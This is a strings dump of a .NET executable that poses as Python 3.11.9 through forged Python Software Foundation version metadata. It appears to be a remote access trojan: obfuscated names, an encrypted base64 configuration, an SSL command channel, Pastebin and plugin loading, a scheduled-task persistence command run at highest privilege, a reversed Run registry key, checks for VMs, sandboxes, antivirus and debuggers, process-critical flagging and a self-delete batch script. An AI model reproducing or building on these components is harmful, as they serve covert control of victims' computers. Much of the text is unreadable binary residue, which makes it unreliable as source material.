!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
LaiuAvxEvDA
IedANRBHhmZVSNA
wpOpsfNLvUItXZA
ulEZDhtMpaA
mtXJddFcvSqbeA
MqvfDAXNtOjA
cgXhVMtBGKmA
LapvTfrVKxA
PahEWuMSvvZB
NEnNvAQfAkB
jrqKbexJPFfqYkB
qEPWqFtbZUlB
DPpiFnyWyUHC
WAokWXfabHC
gtFvEfnOxynNC
YTtACTJDUauPRC
hSOZouKXqcUrC
sVPeOxgzvOTsGD
MapNameToOID
get_FormatID
VFjhGVDmutID
nZawQluwbOWD
ayMgkIVdshgD
frJMuGfMuCE
nhOjSgkyTPyzJFJE
ihFbpBJqQAxaE
yIWnXrAseE
xpCfNLicGhE
xGsHJrWlEdmE
FMmJqcGJLHqE
ezzxopzIsE
jIlbCuCmQF
DagDAJyoUF
bdafYMfXKRQqWF
fwRPRcubVhUZF
atnCoZdIVBXZF
QtAQeEobsJmjsFoHnF
EJozDvopWqF
CquoYRimwtPUG
OqDDfOFUAffG
CCDClEhewZihG
avxgIAzYfKyG
EElVNaHnqYxPCH
idNhomMGIGEDAHH
RKwLREHPlcKLH
PBxBSPrYYH
YveozXIjECpH
alCyKSLtCimlyH
lskQQTPUnAI
QxXVKRVjNGI
get_ASCII
BnmDsnCiUQPWQOI
PypYUvzUopfSI
tKaMDbmOuOPVI
KvNcatlbwCGcWI
RyTCEOfJKspYI
TlzQlLnYEIlbI
qJVDMorvQkBoCzsI
WiqHDAbFYqCJ
ckdKnNYHCEMDJ
VIzNjUSILuqHJ
tknmiKBvBMJJ
SzXAwRTLKJ
qKYpBzUMLJ
pzbZrAXTcZRJ
WCduprhStPRAmUJ
IKQhvjLAPcMbJ
nBrYCjMzrvVnJ
QGtiObVhTxUPK
milpABVFkNgHzTK
IpqINHBUfyXK
GWmxJnYvfAhK
VUQYWRilLMiK
wKGnPwhNfKLthnK
bGtSBnPAyFauK
OOPuMCtHbgOOxK
uDecVxwnSCL
eEhCMiIcAemL
xqPcggezBQuL
OdrUopFsYxxiAM
zgUwBmmfnnnoBM
aOXlFBdKpHM
GvOYDgrNLM
kGyulFzBgqSbePM
ehspDPdVOGxLeM
WmGzqHIDobUgM
wwVAsnkZqkGNFoM
yZwFltACWfXyM
CsiQbvlZZVRfyM
eQpMcWACzKyGN
qyGknwmUpSYN
oXTSmvgYjaN
tuaMAnRdsOTCO
bERvcwFrmTYNpFO
lhhbouJnGO
System.IO
zBWUeBZzGNO
koEwLTxddjNO
WAsWQOovWZO
ZKFWcUQczUaO
mbOZERTIBTcO
vFtajgYonhO
UGGMLYLwsfiO
CNcfIbkFjJVIP
nCDqFGlcMJmPP
uwaTdJDyvMcORP
hgrVocQxbTP
aVfjKkFCoDliP
LjLKSvDLYCjP
RKRBVXjDnjP
pLQYndcesoAQ
CnNpCYwijDQ
NnVISXvdmbviSQ
iGaQiOpSaxVQ
OXbggBStCOUziWQ
QtPkwBUqNvAgQ
LHnlaZikoyxQ
ckNoxcBLSR
LQFSVIadKkkTR
MXjGzJhnjZRtXusR
fsLdhIjHGASgES
fxPusbInvffS
MvMswrXnfS
RbVAcqMUQjgS
zgfxxSdDUAPjLhS
JrIgjGAPdEJjS
fPlDcQMjUppS
RbtGaKSXXXjGwS
OpblibAaKHZzS
WpAbTXMtxMAT
AoqxceaFLT
xXpPAsUrpYlHvFdCOT
EIkQkhkUiOZT
wRftLFMjknGypbT
hoGYWSYvpT
fmKOPOPBYBtT
ifgfjzXOvLPCEU
cEHMVNDauoiheTRU
idIhQsxFkXU
rdCYCVyyccU
CCdcFIHiimTeU
IsJhIuytxgCmU
dNJGbPYorGcpU
IBVrFpSDBPuU
IidwyNZHtiAV
get_IV
set_IV
GenerateIV
GNxEGbwZbtaQV
HRMadreHqSV
bRHDELMXhtSV
ZCqXrtdMaWV
cLTgJOaesDlbV
aBmOTvrOUQeV
huMfqpEmGzjXAW
VmoiDddwQYJMSW
ghmdvZkAQrgW
sFOhDvDAtxW
YweCBxvVDAjmsztTX
yvcXIcwhDWX
JSOcmgERmfaX
lCJIKJEUaaKxiX
KZFYccVIPppSQjX
iuEthrtyQPkX
DXcyyeFttFunX
UpfvkeZXMsX
mBffZrLETZOZzX
nZzztbtRShaEY
miuwqRzRZdRGY
iDWRmeupklY
PgrbBFEzxTXfQBZ
XkAlfqendoiBZ
sujULzIoenHrvBZ
XmEtaAiGyEgWxNZ
YWLfhtViOQZ
bxJgcbJCTcZ
HHdWwLZDscZ
btczZCLYPhuiZ
yXTYiqJKlXVAkZ
hLUEiemjbOoZ
SJGlWvHjxYaRasZ
MtEsgGUOvdYauZ
value__
qUXNKNfFAkAAa
jDUvKoblRkvbhXaEa
mymqIaGPgQa
nRDRAGcvYLca
aOmAwqCgEuvwa
PNQvtGeevya
vqsCCOOnQkCb
sNeyVdFdYCqJfEb
QrxdhvjiaqRPb
mscorlib
xYSNgkEVLEjb
dWYtwyNzNkPc
DkJggeccPuKSc
YGPvHQSqzwfbtVc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
IcLOTeLLJQFtc
XBsOBtyJBaSzc
qjYbIqOquQLjNd
BTzRmnzugFkqNd
icHFTNSxaTfyFwBZd
sPBzWWxwrwPZd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
fzNSQtCUbDggtfd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
lMwEqYKbTwrd
jPswJfGdlzd
ihDDRuGcbOAe
dgyanLGyvCwNxFe
qvWvavwqHjHAMMVe
lBVRJNuZUvxWe
WGOyPwBHgxRae
XWQYrPwkfYbe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
OqOTKuNCaRee
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
hlqcqPCkyvWoPBf
aMvpRcsdyMf
rsUOEezbAuRJCbf
LzvTaYanCYbLwff
LXEyOxYwnpif
LugPeDLdNCof
fHiHtDZHjgaRJg
MXcxpXTvTLdg
roXDZrkjPifg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
aPfHEiovRxodog
set_ErrorDialog
tHNYezJbtEYmhCh
OFWmUrGvJENExDh
QkLVExKCiIh
BgveSnNQqFcVLh
XZPwIjZfJNh
RljOegMJffazZh
HOHKOFgAPfqyScdh
uJvOPvJndh
vXmSRsOnDjh
CjkSPIFfGQxQZjh
ComputeHash
VerifyHash
WtatVgYyHvuwsh
get_ExecutablePath
GetTempPath
get_Length
yhNfnCNCsvzh
ELuLiMBGNBi
MtzDQYIwebLi
VvswyBKJvtLi
NoMuQRVWgi
cbYYPUlvTii
vBYbmyEABcMj
nmDXGUpykwVNj
BOYRfJvuWj
JwoqOZYCDeBgj
vdkVNAoAfRUnj
ZBdcLlHXMyiyvoj
YMLkxtpFIvj
mjEMnCAYvj
mkbrjqRfxj
UHaQuQrHJgIk
PPPHkAJvlyVk
MnHclnXFmYk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
GyoWwoBtbrOArdk
NQoXBnpRPrhk
FfVKEpCcRqk
bgbtdHYEXQNKWACl
WtbjfDTtbXRNl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
gSQocGkYqqxul
ATboLyLYAm
JqrAaOZQkPAPm
PZoLEaBKoipXm
nMYxTGCqGECKYm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
btynVPrSWtdm
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
oVjyRQxjnm
Random
ICryptoTransform
wJIUmjNjbsm
BLlxgfHOrZEn
VktupYzeURnsLHn
MbNjHqmPyGPn
NWfHyDZzFblxrTn
APyOvIvfHDYGZn
qtJcqFWuFVZn
ToBoolean
GjCNERsXAnran
X509Chain
AppDomain
get_CurrentDomain
pMXxmdSlDrkn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
YIibelnBsn
yiNHWbNsfDo
dghikmWkFhJo
bitvufnVQbLo
rivJoNuESzbo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
RfwDYfSNYwo
AfJuedNqeYQp
NYlesvvChQBLap
Microsoft.CSharp
hsgEabJKYlVxurp
MiTerTqkpEgBq
ihJliTkJqMHOq
IbSKTCaNQVQq
aPfjawvyQq
nevvrcqlNjbq
leetGZspICJTNvuZdq
QtjUgUycEYYWhfq
HtYQlwaGtnIuiq
System.Linq
GLCIJzPTuq
hODHTPVkTRNGTr
ufRIsUiurXUr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
jTmXSFzsfXmKtr
IntPtr
DzMUNexXnWur
AoeKFiSLLEs
hKVfbHcbqvCFs
rPEvyYQQLEIZZs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
XQJfMKRuXNLkhs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
lIFaqgtHPws
MhoyzloGJt
twShBzIAdUUJt
kldQrAqRkfXpsRPt
YascKUDfiPt
QSnPAFMTrzkfWt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
pDwvcWKYqvpt
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
IOBUEorNLyt
jmPvxeBAcceIEu
PdaYQmJGlLu
VwDzmHLLChMu
BcBtZKMTdVsu
TZQsMGPepQZav
KrZipaJWrmv
IWvYiOFzFvzqnv
dbiyWojMlkxXqv
rnXonMspuUsv
VyBLHsgaZZxv
pItNkQiZapiNuGw
wskjftrwJw
IyaiuMnKEFQxwKw
SIxQOzFVmTw
aJWJYATXvVw
ufXFfXikUnw
GetForegroundWindow
set_CreateNoWindow
wHIQjWEIzsw
gjOOqQWxvw
ZxhbxwyFlaCJx
nZnzkwPQfZtXtOx
jMPYrXRaNoBOIZx
TkztoKpKBtDnnbx
msVMBBMiDDykNnx
DbjbNGVcnpdmGsx
ZDEGFVdotJEy
nFqXmbKdIy
oPzNqpizPy
cUHHAgQJyQy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlLupefDoy
BlockCopy
ToBinary
get_SystemDirectory
Registry
XwGkTMyEzisy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
HOGSNcGVoCinkty
IsNullOrEmpty
JhkSqeympDz
qhXhxGvrbdBMz
IxlfmyRdUz
OMJllhjjyXMnz
fvUxWJpfrQLSsz
xQDsRXzMmRkwz
gCcNgCXlUOSlSyz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
fDVVedU
=EU.Px
4Nnz3p
?e8o C
s"o8z)
@u>pzm
2L$P][
_TyQDaj
*w&`"W
8Bsw _y
I2kQ5z
Sx8LIZF(\
4FY%2*j
5)SGT
p=pgjV
`uFV0<
i;?:9r
v/p%W.
)uqip*7
!w:`Z `
,*kqd/
Xn@_x }>
.Y4(8h
@7"= ]
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
SHA256
KtlfezmNpYgWSYLz/IsZ9QeIC171KiSlsnDqAvUYpIPoNJ1jGwEY5pAA14H7/vJ9w27i3ScrO6qsZ7AZ3ICjzCSLK3q0yjuApzQmMHeE/04=
BO4QkSgBr6/+XIXeSus3u7UHEoZ/WpNad22W6QxJxgOlqSQAg5wzL/WBY741bh+yck0ZZmdCwHAuL/MJsiOL2w==
ipceScc5xbsj27I5htsMevLSnpfOT47W4IqAgbVAZxcC/84BlnEOs1sBjCqwAbDJn1Xhd4oPhZJ7+3C4Xtvk6g==
IqzDqtgq0LUftIQ5TJmcfYB8n2d5HH7J5jVCxmui3inrRqKZ0miqH8Rz/Dqy8HZg9qvMfPS+e6ylc5+K2iDpQA==
%AppData%
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Python Software Foundation
FileDescription
Python 3.11.9 (64-bit)
FileVersion
3.11.9150.0
InternalName
LegalCopyright
Copyright (c) Python Software Foundation. All rights reserved.
LegalTrademarks
OriginalFilename
ProductName
Python 3.11.9 (64-bit)
ProductVersion
3.11.9150.0
Assembly Version
3.11.9150.0